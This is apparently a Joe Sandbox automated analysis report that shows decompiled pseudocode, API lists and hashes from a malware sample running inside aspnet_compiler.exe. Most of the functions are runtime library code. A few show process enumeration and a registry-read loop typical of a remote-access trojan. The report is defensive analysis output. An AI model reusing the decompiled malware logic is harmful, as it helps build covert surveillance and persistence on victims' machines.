                0x00447db3
                0x00447db3
                0x00447de0
                0x00447d93
                0x00447d93
                0x00447d93
                0x00447ded
                0x00447def
                0x00447df1
                0x00447df3
                0x00447e03
                0x00447e03
                0x00447df5
                0x00447df5
                0x00447df8
                0x00000000
                0x00447dfa
                0x00447dfa
                0x00447dfb
                0x00447e00
                0x00447df8
                0x00447e09
                0x00447e14
                0x00447e1f
                0x00447c13
                0x00447c17
                0x00447c1c
                0x00447c1f
                0x00000000
                0x00447c25
                0x00447c29
                0x00447c2e
                0x00447c31
                0x00000000
                0x00447c37
                0x00447c3d
                0x00447c42
                0x00447c48
                0x00447c58
                0x00447c5e
                0x00447c65
                0x00447c6b
                0x00447c6f
                0x00447c75
                0x00447c78
                0x00447c7f
                0x00447c86
                0x00447c86
                0x00447c89
                0x00447c90
                0x00447ca8
                0x00447ca8
                0x00447cab
                0x00447c92
                0x00447c92
                0x00447c99
                0x00000000
                0x00447c9b
                0x00447c9d
                0x00447ca3
                0x00447ca3
                0x00447c99
                0x00447cb3
                0x00447ccf
                0x00447cdf
                0x00447cd6
                0x00447cd8
                0x00447cd8
                0x00447cfd
                0x00447d0f
                0x00447d04
                0x00447d07
                0x00447d07
                0x00447cfd
                0x00447d19
                0x00447d23
                0x00447d28
                0x00447d2d
                0x00447d34
                0x00447d34
                0x00447c31
                0x00447c1f

                APIs
                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D204), ref: 00447C4F
                • WideCharToMultiByte.KERNEL32(00000000,00000000,00470764,000000FF,00000000,0000003F,00000000,?,?), ref: 00447CC7
                • WideCharToMultiByte.KERNEL32(00000000,00000000,004707B8,000000FF,?,0000003F,00000000,?), ref: 00447CF4
                • _free.LIBCMT ref: 00447C3D
                  • Part of subcall function 00445002: HeapFree.KERNEL32(00000000,00000000,?,0044F4EF,?,00000000,?,00000000,?,0044F793,?,00000007,?,?,0044FCDE,?), ref: 00445018
                  • Part of subcall function 00445002: GetLastError.KERNEL32(?,?,0044F4EF,?,00000000,?,00000000,?,0044F793,?,00000007,?,?,0044FCDE,?,?), ref: 0044502A
                • _free.LIBCMT ref: 00447E09
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                • String ID:
                • API String ID: 1286116820-0
                • Opcode ID: 192cb104f115433a19df37c8a32fadc6d02125d47b70fccf30c1571d909818d4
                • Instruction ID: b174790296e1c1cb64190fb610b95ef3deb4325f3671f118df16a2f4d1cf92b6
                • Opcode Fuzzy Hash: 192cb104f115433a19df37c8a32fadc6d02125d47b70fccf30c1571d909818d4
                • Instruction Fuzzy Hash: 97511871D04209EBEB14EF79DC819AA77B8EF40324F11026FE455E3291E7389D428B9C
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040EE40 Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON
                Download Yara Rule
                C-Code - Quality: 96%
                			E0040EE40(void* __ebx, void* __ecx, void* __edx, void* __eflags) {
				char _v540;
				char _v568;
				void* _v572;
				void* _v584;
				char _v604;
				void* _v608;
				char _v628;
				void* _v632;
				char _v652;
				void* _v656;
				char _v676;
				void* _v680;
				char _v700;
				void* _v704;
				char _v724;
				void* _v728;
				char _v748;
				void* _v752;
				char _v772;
				void* _v776;
				char _v796;
				void* _v800;
				char _v820;
				void* _v824;
				char _v844;
				void* _v848;
				char _v868;
				void* _v872;
				char _v892;
				void* _v896;
				char _v912;
				char _v916;
				void* _v920;
				void* __edi;
				void* __esi;
				void* __ebp;
				int _t45;
				void* _t50;
				void* _t51;
				void* _t53;
				void* _t133;
				void* _t134;

				_t120 = __edx;
				_t81 = __ecx;
				_t80 = __ebx;
				_t133 = __ecx;
				E004020BF(__ebx, __ecx);
				 *0x472ae4 = E0041AB12(_t81);
				_t134 = CreateToolhelp32Snapshot(2, 0);
				if(_t134 != 0) {
					_v568 = 0x22c;
					_push( &_v568);
					Process32FirstW(_t134);
					_t45 = Process32NextW(_t134,  &_v572);
					_t138 = _t45;
					if(_t45 != 0) {
						do {
							E0040415E(__ebx,  &_v912, _t120, 0x465488,  &_v540);
							_t50 = E0041A6E9(_t80,  &_v604, E0041AB40(_v572) & 0x000000ff);
							_t51 = E0041A6E9(_t80,  &_v628, _v572);
							_t53 = E0041A879(_t80,  &_v676, E0041AB76( &_v652, _v572));
							_t120 = E00402E81( &_v868, E00408832(_t80,  &_v844, E00402E81( &_v820, E00408832(_t80,  &_v796, E00402E81( &_v772, E00408832(_t80,  &_v748, E004087CF(_t80,  &_v724, _t133, 0x465488, _t138, E0041A879(_t80,  &_v700,  &_v916)), _t133, 0x465488, _t138, 0x465488), _t53), _t133, 0x465488, _t138, 0x465488), _t51), _t133, 0x465488, _t138, 0x465488), _t50);
							E00401FC2(_t133, _t61, _t134, E00408832(_t80,  &_v892, _t61, _t133, 0x465488, _t138, "|"));
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401EE9();
							E00401FB8();
							E00401FB8();
							E00401EE9();
						} while (Process32NextW(_t134,  &_v584) != 0);
					}
					CloseHandle(_t134);
				}
				return _t133;
			}













































                0x0040ee40
                0x0040ee40
                0x0040ee40
                0x0040ee49
                0x0040ee4b
                0x0040ee59
                0x0040ee64
                0x0040ee68
                0x0040ee75
                0x0040ee80
                0x0040ee82
                0x0040ee91
                0x0040ee97
                0x0040ee99
                0x0040eea4
                0x0040eeb0
                0x0040eed0
                0x0040eee5
                0x0040ef08
                0x0040ef83
                0x0040ef92
                0x0040ef9b
                0x0040efa4
                0x0040efad
                0x0040efb6
                0x0040efc2
                0x0040efce
                0x0040efda
                0x0040efe6
                0x0040eff2
                0x0040effe
                0x0040f00a
                0x0040f016
                0x0040f022
                0x0040f02b
                0x0040f03f
                0x0040eea4
                0x0040f048
                0x0040f048
                0x0040f059

                APIs
                  • Part of subcall function 0041AB12: GetCurrentProcess.KERNEL32(?,?,?,0040CFAE,WinDir,00000000,00000000), ref: 0041AB23
                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040EE5E
                • Process32FirstW.KERNEL32(00000000,?), ref: 0040EE82
                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040EE91
                • CloseHandle.KERNEL32(00000000), ref: 0040F048
                  • Part of subcall function 0041AB40: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040EB16,00000000,?,?,00473280), ref: 0041AB55
                  • Part of subcall function 0041AB76: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 0041AB8B
                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F039
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: ProcessProcess32$NextOpen$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                • String ID:
                • API String ID: 1735047541-0
                • Opcode ID: 9a99e7b29474ea2fafdff9d0398a0b8897655f81ffde536f2fed65fdb5951a3c
                • Instruction ID: fc5c85540f889f3a2ab1a6016a9079e2269e38591cc5ac43cbc88825ef87a1e7
                • Opcode Fuzzy Hash: 9a99e7b29474ea2fafdff9d0398a0b8897655f81ffde536f2fed65fdb5951a3c
                • Instruction Fuzzy Hash: CD4142311082415BC324F761DC91AEFB3E9AFD4344F50493EF48A921E2EF38A94AC65A
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00442719 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 83%
                			E00442719(signed int* __ecx, signed int __edx) {
				signed int _v8;
				intOrPtr* _v12;
				signed int _v16;
				signed int _t28;
				signed int _t29;
				intOrPtr _t33;
				signed int _t37;
				signed int _t38;
				signed int _t40;
				void* _t50;
				signed int _t56;
				intOrPtr* _t57;
				signed int _t68;
				signed int _t71;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t78;
				signed int _t80;
				signed int* _t81;
				signed int _t85;
				void* _t86;

				_t72 = __edx;
				_v12 = __ecx;
				_t28 =  *__ecx;
				_t81 =  *_t28;
				if(_t81 != 0) {
					_t29 =  *0x46f00c; // 0xd60a1515
					_t56 =  *_t81 ^ _t29;
					_t78 = _t81[1] ^ _t29;
					_t83 = _t81[2] ^ _t29;
					asm("ror edi, cl");
					asm("ror esi, cl");
					asm("ror ebx, cl");
					if(_t78 != _t83) {
						L14:
						 *_t78 = E004425DA( *((intOrPtr*)( *((intOrPtr*)(_v12 + 4)))));
						_t33 = E00432C79(_t56);
						_t57 = _v12;
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)))) = _t33;
						_t24 = _t78 + 4; // 0x4
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 4)) = E00432C79(_t24);
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 8)) = E00432C79(_t83);
						_t37 = 0;
						L15:
						return _t37;
					}
					_t38 = 0x200;
					_t85 = _t83 - _t56 >> 2;
					if(_t85 <= 0x200) {
						_t38 = _t85;
					}
					_t80 = _t38 + _t85;
					if(_t80 == 0) {
						_t80 = 0x20;
					}
					if(_t80 < _t85) {
						L9:
						_push(4);
						_t80 = _t85 + 4;
						_push(_t80);
						_v8 = E0044E355(_t56);
						_t40 = E00445002(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							goto L11;
						}
						_t37 = _t40 | 0xffffffff;
						goto L15;
					} else {
						_push(4);
						_push(_t80);
						_v8 = E0044E355(_t56);
						E00445002(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							L11:
							_t56 = _t68;
							_v8 = _t68 + _t85 * 4;
							_t83 = _t68 + _t80 * 4;
							_t78 = _v8;
							_push(0x20);
							asm("ror eax, cl");
							_t71 = _t78;
							_v16 = 0 ^  *0x46f00c;
							asm("sbb edx, edx");
							_t74 =  !_t72 & _t68 + _t80 * 0x00000004 - _t78 + 0x00000003 >> 0x00000002;
							_v8 = _t74;
							if(_t74 == 0) {
								goto L14;
							}
							_t75 = _v16;
							_t50 = 0;
							do {
								_t50 = _t50 + 1;
								 *_t71 = _t75;
								_t71 = _t71 + 4;
							} while (_t50 != _v8);
							goto L14;
						}
						goto L9;
					}
				}
				return _t28 | 0xffffffff;
			}

























                0x00442719
                0x00442723
                0x00442727
                0x00442729
                0x0044272d
                0x00442737
                0x00442748
                0x0044274d
                0x0044274f
                0x00442751
                0x00442753
                0x00442755
                0x00442759
                0x00442813
                0x00442821
                0x00442823
                0x00442828
                0x0044282f
                0x00442831
                0x0044283f
                0x0044284e
                0x00442851
                0x00442853
                0x00000000
                0x00442854
                0x00442761
                0x00442766
                0x0044276b
                0x0044276d
                0x0044276d
                0x0044276f
                0x00442774
                0x00442778
                0x00442778
                0x0044277b
                0x0044279a
                0x0044279a
                0x0044279c
                0x0044279f
                0x004427a8
                0x004427ab
                0x004427b0
                0x004427b3
                0x004427b8
                0x00000000
                0x00000000
                0x004427ba
                0x00000000
                0x0044277d
                0x0044277d
                0x0044277f
                0x00442788
                0x0044278b
                0x00442790
                0x00442793
                0x00442798
                0x004427c2
                0x004427c5
                0x004427c7
                0x004427ca
                0x004427d2
                0x004427d8
                0x004427df
                0x004427e1
                0x004427e9
                0x004427f8
                0x004427fc
                0x004427fe
                0x00442801
                0x00000000
                0x00000000
                0x00442803
                0x00442806
                0x00442808
                0x00442808
                0x00442809
                0x0044280b
                0x0044280e
                0x00000000
                0x00442808
                0x00000000
                0x00442798
                0x0044277b
                0x00000000

                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: _free
                • String ID:
                • API String ID: 269201875-0
                • Opcode ID: c116326db574ec4ac976eebbd44619f729e5691f91e73ba179bd56b8a01ad2b5
                • Instruction ID: 2285a7be470c23e98719e3e167ac4dd42b0d3d2551702f58938e7795a41d704d
                • Opcode Fuzzy Hash: c116326db574ec4ac976eebbd44619f729e5691f91e73ba179bd56b8a01ad2b5
                • Instruction Fuzzy Hash: E941F332E002009FEB10DF79C981A5EB3B5EF89714F5581AEE915EB381DBB5AD01CB84
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0044F9AC Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 81%
                			E0044F9AC(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				signed int _t34;
				signed int _t40;
				int _t46;
				int _t53;
				void* _t55;
				int _t57;
				signed int _t63;
				int _t67;
				short* _t69;
				signed int _t70;
				short* _t71;

				_t34 =  *0x46f00c; // 0xd60a1515
				_v8 = _t34 ^ _t70;
				E004390B7(__ebx,  &_v28, __edx, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t53 =  *(_v24 + 8);
					_t57 = _t53;
					_a24 = _t53;
				}
				_t67 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					return E004338BB(_v8 ^ _t70);
				}
				_t55 = _t40 + _t40;
				asm("sbb eax, eax");
				if((_t55 + 0x00000008 & _t40) == 0) {
					_t69 = 0;
					L11:
					if(_t69 != 0) {
						E00435760(_t67, _t69, _t67, _t55);
						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t69, _v12);
						if(_t46 != 0) {
							_t67 = GetStringTypeW(_a8, _t69, _t46, _a20);
						}
					}
					L14:
					E00434713(_t69);
					goto L15;
				}
				asm("sbb eax, eax");
				_t48 = _t40 & _t55 + 0x00000008;
				_t63 = _t55 + 8;
				if((_t40 & _t55 + 0x00000008) > 0x400) {
					asm("sbb eax, eax");
					_t69 = E00444A38(_t63, _t48 & _t63);
					if(_t69 == 0) {
						goto L14;
					}
					 *_t69 = 0xdddd;
					L9:
					_t69 =  &(_t69[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E00455A90();
				_t69 = _t71;
				if(_t69 == 0) {
					goto L14;
				}
				 *_t69 = 0xcccc;
				goto L9;
			}




















                0x0044f9b4
                0x0044f9bb
                0x0044f9c7
                0x0044f9cc
                0x0044f9d1
                0x0044f9d6
                0x0044f9d9
                0x0044f9db
                0x0044f9db
                0x0044f9e0
                0x0044f9f9
                0x0044f9ff
                0x0044fa04
                0x0044faa3
                0x0044faa7
                0x0044faac
                0x0044faac
                0x0044fac8
                0x0044fac8
                0x0044fa0a
                0x0044fa12
                0x0044fa16
                0x0044fa62
                0x0044fa64
                0x0044fa66
                0x0044fa6b
                0x0044fa82
                0x0044fa8a
                0x0044fa9a
                0x0044fa9a
                0x0044fa8a
                0x0044fa9c
                0x0044fa9d
                0x00000000
                0x0044faa2
                0x0044fa1d
                0x0044fa1f
                0x0044fa21
                0x0044fa29
                0x0044fa46
                0x0044fa50
                0x0044fa55
                0x00000000
                0x00000000
                0x0044fa57
                0x0044fa5d
                0x0044fa5d
                0x00000000
                0x0044fa5d
                0x0044fa2d
                0x0044fa31
                0x0044fa36
                0x0044fa3a
                0x00000000
                0x00000000
                0x0044fa3c
                0x00000000

                APIs
                • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042C60C,?,?,?,00000001,00000000,?,00000001,0042C60C,0042C60C), ref: 0044F9F9
                • __alloca_probe_16.LIBCMT ref: 0044FA31
                • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042C60C,?,?,?,00000001,00000000,?,00000001,0042C60C,0042C60C,?), ref: 0044FA82
                • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042C60C,0042C60C,?,00000002,00000000), ref: 0044FA94
                • __freea.LIBCMT ref: 0044FA9D
                  • Part of subcall function 00444A38: RtlAllocateHeap.NTDLL(00000000,00433B6F,?,P@,00437117,?,?,00000000,?,P@,0040D366,00433B6F,?,?,?,?), ref: 00444A6A
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                • String ID:
                • API String ID: 313313983-0
                • Opcode ID: a135343eee6ef5a04005f02c8804c8feac57652aa70f0817bf27bbd7988de7b5
                • Instruction ID: c39bf728e7cf4935227f6dd7d506cca849d0501c7d5e8428f05d5abeab6cc89e
                • Opcode Fuzzy Hash: a135343eee6ef5a04005f02c8804c8feac57652aa70f0817bf27bbd7988de7b5
                • Instruction Fuzzy Hash: 2631E372A0020AABEF249F65DC41DAF7BA5EB40314F04057AFC08E7251E739DD59CB94
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00411C1E Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 93sleepCOMMON
                Download Yara Rule
                C-Code - Quality: 90%
                			E00411C1E(void* __eflags) {
				char _v524;
				void* __ebx;
				void* __edi;
				void* _t6;
				void* _t7;
				void* _t8;
				signed int _t9;
				void* _t11;
				char _t16;
				void* _t19;
				void* _t20;
				void* _t23;
				void* _t31;
				signed int _t55;
				void* _t57;

				_t57 = (_t55 & 0xfffffff8) - 0x208;
				_t31 = 0x473220;
				_t6 = E00406E3A(0x46a8f0);
				_t53 = "exepath";
				if(_t6 == 0) {
					goto L8;
				} else {
					E00435760(0x46a8f0,  &_v524, 0, 0x208);
					_t19 = E0040245C();
					_t20 = E00401F8B(0x473280);
					_t44 = E00401F8B(0x473238);
					_t23 = E004129E0(_t22, "exepath",  &_v524, 0x410, _t20, _t19);
					_t57 = _t57 + 0x20;
					if(_t23 != 0) {
						L004086CB(0x473280, 0x473220, _t44,  &_v524);
					}
					_t31 = 0x473220;
					if(E00406E3A(0x46a8f0) == 0) {
						while(1) {
							L8:
							__eflags =  *0x470d60;
							if( *0x470d60 == 0) {
								break;
							}
							Sleep(0xbb8);
							__eflags =  *0x470b32;
							if( *0x470b32 != 0) {
								_push(E00401EE4(0x473208));
								E0040C21B(0x473208);
								_pop(_t31);
							}
							_push(_t31);
							_t7 = E0040245C();
							_t8 = E00401F8B(0x473280);
							_t9 = E0040245C();
							_t11 = E00401EE4(0x473220);
							_t31 = 0x473238;
							E00412C2F(E00401F8B(0x473238), __eflags, _t53, _t11, 2 + _t9 * 2, _t8, _t7);
							_t57 = _t57 + 0x18;
						}
						_t16 = 0;
						__eflags = 0;
					} else {
						_t16 = 1;
					}
				}
				return _t16;
			}


















                0x00411c24
                0x00411c3a
                0x00411c3c
                0x00411c46
                0x00411c4d
                0x00000000
                0x00411c53
                0x00411c5f
                0x00411c69
                0x00411c71
                0x00411c8c
                0x00411c8e
                0x00411c93
                0x00411c98
                0x00411ca1
                0x00411ca1
                0x00411ca8
                0x00411cb1
                0x00411d1c
                0x00411d1c
                0x00411d1c
                0x00411d23
                0x00000000
                0x00000000
                0x00411cbd
                0x00411cc3
                0x00411cca
                0x00411cd6
                0x00411cd8
                0x00411cde
                0x00411cde
                0x00411cdf
                0x00411ce2
                0x00411cea
                0x00411cf2
                0x00411d01
                0x00411d08
                0x00411d14
                0x00411d19
                0x00411d19
                0x00411d25
                0x00411d25
                0x00411cb3
                0x00411cb5
                0x00411cb5
                0x00411cb1
                0x00411d2e

                APIs
                  • Part of subcall function 004129E0: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,00473238), ref: 004129FC
                  • Part of subcall function 004129E0: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412A15
                  • Part of subcall function 004129E0: RegCloseKey.ADVAPI32(00000000), ref: 00412A20
                • Sleep.KERNEL32(00000BB8), ref: 00411CBD
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: CloseOpenQuerySleepValue
                • String ID: 2G$82G$82G$exepath
                • API String ID: 4119054056-3664068176
                • Opcode ID: dce137320b54f542d7e81c6f206edef1d765319c2fd189bc890e2f0ca8d35697
                • Instruction ID: 1bc3c23f432ba4f57a41c102a15aec319e0c21ae64d144f38269a80ff3ae14c8
                • Opcode Fuzzy Hash: dce137320b54f542d7e81c6f206edef1d765319c2fd189bc890e2f0ca8d35697
                • Instruction Fuzzy Hash: 5021F4A0B0030427D600B76A6C46ABF228E8B80308F00497FB946E72D3EF3C9D4641AE
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0044DBDA Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                Download Yara Rule
                C-Code - Quality: 93%
                			E0044DBDA() {
				int _v8;
				void* __ecx;
				void* _t6;
				int _t7;
				char* _t13;
				int _t17;
				void* _t19;
				char* _t25;
				WCHAR* _t27;

				_t27 = GetEnvironmentStringsW();
				if(_t27 == 0) {
					L7:
					_t13 = 0;
				} else {
					_t6 = E0044DBA3(_t27);
					_pop(_t19);
					_t17 = _t6 - _t27 >> 1;
					_t7 = WideCharToMultiByte(0, 0, _t27, _t17, 0, 0, 0, 0);
					_v8 = _t7;
					if(_t7 == 0) {
						goto L7;
					} else {
						_t25 = E00444A38(_t19, _t7);
						if(_t25 == 0 || WideCharToMultiByte(0, 0, _t27, _t17, _t25, _v8, 0, 0) == 0) {
							_t13 = 0;
						} else {
							_t13 = _t25;
							_t25 = 0;
						}
						E00445002(_t25);
					}
				}
				if(_t27 != 0) {
					FreeEnvironmentStringsW(_t27);
				}
				return _t13;
			}












                0x0044dbe9
                0x0044dbef
                0x0044dc47
                0x0044dc47
                0x0044dbf1
                0x0044dbf2
                0x0044dbf7
                0x0044dc00
                0x0044dc06
                0x0044dc0c
                0x0044dc11
                0x00000000
                0x0044dc13
                0x0044dc19
                0x0044dc1e
                0x0044dc3c
                0x0044dc36
                0x0044dc36
                0x0044dc38
                0x0044dc38
                0x0044dc3f
                0x0044dc44
                0x0044dc11
                0x0044dc4b
                0x0044dc4e
                0x0044dc4e
                0x0044dc5c

                APIs
                • GetEnvironmentStringsW.KERNEL32 ref: 0044DBE3
                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044DC06
                  • Part of subcall function 00444A38: RtlAllocateHeap.NTDLL(00000000,00433B6F,?,P@,00437117,?,?,00000000,?,P@,0040D366,00433B6F,?,?,?,?), ref: 00444A6A
                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044DC2C
                • _free.LIBCMT ref: 0044DC3F
                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044DC4E
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                • String ID:
                • API String ID: 336800556-0
                • Opcode ID: 10270a1cb6cb36a8ff3114673be7265c51b3b850fc2d116722adec396266e159
                • Instruction ID: d30a67c417177e80d80b31b0a31e6726aa7580f18a7a9fd153e391297dd7151b
                • Opcode Fuzzy Hash: 10270a1cb6cb36a8ff3114673be7265c51b3b850fc2d116722adec396266e159
                • Instruction Fuzzy Hash: 38017172A057157F37211AA66D89C7F7A6DDAC2B65315017EF904D2341DEA88C02C1B9
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00446B19 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 82%
                			E00446B19(void* __ecx) {
				void* __esi;
				intOrPtr _t2;
				void* _t4;
				void* _t10;
				void* _t11;
				void* _t13;
				void* _t15;
				long _t16;

				_t11 = __ecx;
				_t16 = GetLastError();
				_t10 = 0;
				_t2 =  *0x46f1dc; // 0x6
				_t19 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t15 = E004443F4(_t11, 1, 0x364);
					_pop(_t13);
					if(_t15 != 0) {
						_t4 = E00447092(_t13, _t16, __eflags,  *0x46f1dc, _t15);
						__eflags = _t4;
						if(_t4 != 0) {
							E00446907(_t13, _t15, 0x470664);
							E00445002(_t10);
							__eflags = _t15;
							if(_t15 != 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t15);
							goto L4;
						}
					} else {
						_push(_t10);
						L4:
						E00445002();
						L8:
						SetLastError(_t16);
					}
				} else {
					_t15 = E0044703C(_t11, _t16, _t19, _t2);
					if(_t15 != 0) {
						L9:
						SetLastError(_t16);
						_t10 = _t15;
					} else {
						goto L2;
					}
				}
				return _t10;
			}











                0x00446b19
                0x00446b24
                0x00446b26
                0x00446b28
                0x00446b2d
                0x00446b30
                0x00446b3e
                0x00446b4a
                0x00446b4d
                0x00446b50
                0x00446b62
                0x00446b67
                0x00446b69
                0x00446b74
                0x00446b7a
                0x00446b82
                0x00446b84
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00446b6b
                0x00446b6b
                0x00000000
                0x00446b6b
                0x00446b52
                0x00446b52
                0x00446b53
                0x00446b53
                0x00446b86
                0x00446b87
                0x00446b87
                0x00446b32
                0x00446b38
                0x00446b3c
                0x00446b8f
                0x00446b90
                0x00446b96
                0x00000000
                0x00000000
                0x00000000
                0x00446b3c
                0x00446b9d

                APIs
                • GetLastError.KERNEL32(?,00000000,00000000,0043A556,00000000,00000000,?,0043A5DA,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00446B1E
                • _free.LIBCMT ref: 00446B53
                • _free.LIBCMT ref: 00446B7A
                • SetLastError.KERNEL32(00000000,?,004050E3), ref: 00446B87
                • SetLastError.KERNEL32(00000000,?,004050E3), ref: 00446B90
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: ErrorLast$_free
                • String ID:
                • API String ID: 3170660625-0
                • Opcode ID: 2af989fa884a69d0fa37520c75958db6afc4f652e0641eba9099b80d7b86f832
                • Instruction ID: 0346a1b294bc514b0a994de80f7e6f12b46350d74b5091e52828a709d6f7ce0e
                • Opcode Fuzzy Hash: 2af989fa884a69d0fa37520c75958db6afc4f652e0641eba9099b80d7b86f832
                • Instruction Fuzzy Hash: B6012676205B506BB7112629BC45D6F2269CBD37B9722003BF409D32C2EE7CDC06416F
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0044F23C Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 100%
                			E0044F23C(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0x46f188; // 0x46f180
					if(_t23 != 0) {
						E00445002(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x46f18c; // 0x47065c
					if(_t24 != 0) {
						E00445002(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x46f190; // 0x47065c
					if(_t25 != 0) {
						E00445002(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x46f1b8; // 0x46f184
					if(_t26 != 0) {
						E00445002(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0x46f1bc; // 0x470660
					if(_t27 != 0) {
						return E00445002(_t6);
					}
				}
				return _t6;
			}










                0x0044f242
                0x0044f247
                0x0044f24b
                0x0044f251
                0x0044f254
                0x0044f259
                0x0044f25d
                0x0044f263
                0x0044f266
                0x0044f26b
                0x0044f26f
                0x0044f275
                0x0044f278
                0x0044f27d
                0x0044f281
                0x0044f287
                0x0044f28a
                0x0044f28f
                0x0044f290
                0x0044f293
                0x0044f299
                0x00000000
                0x0044f2a1
                0x0044f299
                0x0044f2a4

                APIs
                • _free.LIBCMT ref: 0044F254
                  • Part of subcall function 00445002: HeapFree.KERNEL32(00000000,00000000,?,0044F4EF,?,00000000,?,00000000,?,0044F793,?,00000007,?,?,0044FCDE,?), ref: 00445018
